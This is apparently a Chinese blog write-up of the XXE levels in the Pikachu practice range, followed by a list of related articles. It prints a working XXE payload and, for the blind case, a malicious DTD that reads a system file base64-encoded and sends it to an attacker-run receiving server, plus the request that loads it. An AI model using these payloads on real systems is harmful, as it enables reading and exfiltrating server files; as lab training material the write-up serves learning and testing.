pikache靶场通关——XXE

最新推荐文章于 2024-05-13 10:46:10 发布
最新推荐文章于 2024-05-13 10:46:10 发布
阅读量208 收藏 2
点赞数
分类专栏: web安全 渗透模拟练手 文章标签: web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p36273/article/details/134189379
版权

文章目录

前言

关卡样式:
在这里插入图片描述

一、有返回显示XXE

1、在输入框输入随机数据,抓包

输入123,查看结果:
在这里插入图片描述
输入123后,显示上图数据,说明这里输入的XML格式错误

查看抓取的数据包:
在这里插入图片描述
抓到的数据包如上

2、在BP数据包和靶场中各尝试使用正确的XML格式重新输入

输入的XML格式:

<?xml version="1.0"?>
<!DOCTYPE foo[
<!ENTITY xxe "正确的XXE输入">]>
<foo>&xxe;</foo>

在BP数据包中修改后重发送
在这里插入图片描述
发现还是报错。

在靶场中输入:
在这里插入图片描述
这里发现竟然输入正确了。

这其中有什么区别呢?使用BP抓包看一看
在这里插入图片描述
这里发现被URL编码了
在这里插入图片描述

3、使用BP进行URL编码,利用XXE来读取系统文件

在这里插入图片描述
在这里插入图片描述
这里就成功读取到指定的文件内容了。

二、无回显XXE

1、模拟使用的机器

这里需要使用3台机器模拟:

  • 攻击机:192.168.43.130
  • 靶机:192.168.43.131
  • 模拟外网接收服务器:192.168.43.129

2、修改代码实现靶场无回显

2.1、修改靶场代码,让其实现无回显

在这里插入图片描述

2.2、在靶场输入数据,抓包测试

在这里插入图片描述
在这里插入图片描述
这里地区实现无回显了。

3、开始复现

3.1、利用DNSLog来测试XXE是否存在

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

返回DNSLog查看
在这里插入图片描述
的确接收到了,这就说明XXE是存在的。

3.2、创建一个恶意dtd文档,构造读取方式

在这里插入图片描述
注意:这里的IP地址是写模拟外网接收服务器的IP地址
POC:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/windows/win.ini">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.43.129?c=%file;'>">

接着就把这个文件改成dtd格式,放置到模拟外网接收服务器中

在这里插入图片描述

3.3、在接受服务器开启server服务

开启位置是放置dtd的文件夹
在这里插入图片描述

3.4、在BP中构造POC重发送

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在接受服务器就看到上图的信息,把“c=”后面的数据复制出来,进行BASE64解码
在这里插入图片描述
解码后就得到我们想得到的信息。

POC:

<?xml version="1.0"?>
<!DOCTYPE foo [
	<!ENTITY % xxe SYSTEM "http://192.168.43.129/123.dtd">
	%xxe;%int;%send;
]>

注意:上面需要在xxe实体前加上%才能引用,还有不要忘记分号(;)

3.5、POC讲解

很多人会疑问:%xxe;%int;%send;究竟是什么意思?

其实这里第一个%xxe;就是指向dtd文件
在这里插入图片描述

第二个%int;就是指向构造的XML语句
在这里插入图片描述

第三个send;就是指向我们要读取的目标文件
在这里插入图片描述
在这里插入图片描述

p36273
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu之XXE漏洞
weixin_46062722的博客
02-25 647
漏洞介绍 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里
pikachu靶场 :十三、XXE
qq_43233085的博客
02-02 743
pikachu靶场 :十三、XXE概述XXE 漏洞盲注 概述 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体...
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3680
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
Pikachu 靶场 XXE 通关解析
最新发布
Flag少侠的博客
05-13 1114
XXE漏洞(XML External Entity Injection)是一种安全漏洞,存在于使用XML解析器的应用程序中。攻击者可以利用XXE漏洞来读取服务器上的任意文件、执行远程请求、进行内部端口扫描等操作,甚至可能导致服务器拒绝服务攻击。XXE漏洞的原理是利用应用程序对外部实体的解析支持。XML实体是可以引用外部资源(如文件或URL)的独立实体。当应用程序在解析XML时,如果未正确配置解析器或没有禁用外部实体的引用,攻击者可以构造恶意的XML实体来触发XXE漏洞。]>
Pikachu靶场-XXE
自强不息
01-03 221
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PiKachu靶场XXE (xml外部实体注入漏洞)
angry_program的博客
02-22 3224
概述 XXE -"xml external entity injection" 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。XML 教程...
Pikachu靶场通关笔记--XXE
weixin_45908624的博客
12-27 598
xxe
pikachu靶场XXE漏洞详解
lxz021202的博客
03-02 1338
然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。这个payload会调用Kali中的xxe.dtd文件。
pikachu靶场___XXE漏洞教程
qq_41584172的博客
11-11 3428
pikachu靶场___XXE漏洞教程 XXE(XML External Entity Injection)即xml外部实体注入 当程序在解析XML输入时,允许引用外部实体,导致能够引用一个外部恶意文件,可导致执行系统命令、内网端口探测、文件读取,攻击内网服务、dos攻击等。以下用pikachu漏洞靶场进行读取文件的演示。   pikachu靶场下载地址:   https://github.com...
Pikachu系列——XXE
Zlirving_的博客
05-22 1375
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验九 —— XXE XXE概述 xml外部实体注入 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XML概念 XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下: XML ----
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6543
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
XXE漏洞原理和pikachu靶场实验
03-16 1057
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
pikachu靶场&目录遍历&信息泄露&反序列化&XXE&重定向&SSRF(五)
weixin_41665162的博客
08-06 475
文章目录目录遍历解释信息泄露解释PHP反序列化反序列化漏洞为什么要序列化反序列化为什么序列化再反序列化会产生漏洞呢?XXE -"xml external entity injection"解释测试不安全的url跳转解释SSRF(Server-Side Request Forgery:服务器端请求伪造)解释测试-curl测试-file_get_content结语 目录遍历 解释 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时,便会将
【pikachu渗透靶场&Web安全从入门到放弃】之 XXE漏洞原理和案例实验演示—— “叉叉易”
algae
04-17 433
48.10-2 xxe漏洞原理和案例实验演示(Av96582332,P48) XXE( xml external entity injection" 第一部分: XML 声明 <?xml version="1.0"?> <! 第二部分:文档类型定义 DTD <!DOCTYPE note [ <! 定义此文档是 note 类...
网络安全之XXE漏洞总结(pikachu靶场案例解析)
qq_61529962的博客
12-15 485
xxe漏洞原理解析,php靶场案例,pikachu靶场
pikache靶场通关——CSRF攻击
p36273的博客
07-01 1489
靶场一共又三关,现在我们就来通关吧。
Pikachu靶场全关攻略(超详细!)
Innocence_0的博客
04-12 1795
文件包含是一个功能, 在各种开发语言都提供了内置的文件包含函数, 这使得开发人员可在一个代码文件中引用另外一个文件的代码,如php中就提供了include()require()虽然文件包含函数中包含的文件代码是固定的, 但是有些时候文件包含的代码文件被写成了一个变量, 且该变量由前端传入, 若该变量没有做安全防护,则可能引发文件包含漏洞文件包含漏洞又分为本地文件包含和远程文件包含。
pikachu 靶场通关(全)
Innocence_0的博客
04-12 2804
1.1.1 漏洞利用burp抓包,ctrl+i 添加爆破根据返回长度得到两个用户。
Pikachu靶场通关教程
npc88888的博客
04-17 1636
账号:admin 密码:123456爆破代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值